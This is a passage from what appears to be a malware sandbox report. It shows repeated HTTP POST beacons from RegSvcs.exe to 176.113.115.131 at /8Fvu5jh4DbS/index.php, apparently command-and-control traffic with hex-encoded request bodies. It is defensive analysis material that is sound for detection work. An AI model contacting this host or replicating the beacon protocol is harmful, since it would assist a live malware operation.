                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:55.380978107 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.455822176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:57.173350096 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:57.863358021 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.455838176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:59.404030085 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:00.109401941 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.455854176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:01.734025002 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:02.419342995 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.455869176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:03.935311079 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:04.628889084 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.455885176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:06.265182018 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:06.970510960 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.455897176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:08.483939886 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:09.181086063 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.455913176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:10.812190056 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:11.501291037 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.455929176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:13.018024921 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:13.708719969 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.455945176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:15.343653917 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:16.047466993 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.455961176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:17.566282988 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:18.273776054 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.455976176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:19.907335043 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:20.603780031 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.455988176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:22.124735117 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:22.831617117 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.456004176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:24.470468044 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:25.156790018 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.456020176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:26.673631907 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:27.388703108 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.456036176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:29.020411015 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:29.707614899 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.456051176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:31.220406055 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:31.919856071 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.456067176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:33.547056913 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:34.257252932 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.456083176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:35.766031981 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:36.481360912 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.456095176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:38.109870911 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:43:38.793694973 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.456100176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:43:40.330431938 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:43:41.037965059 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.456101176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
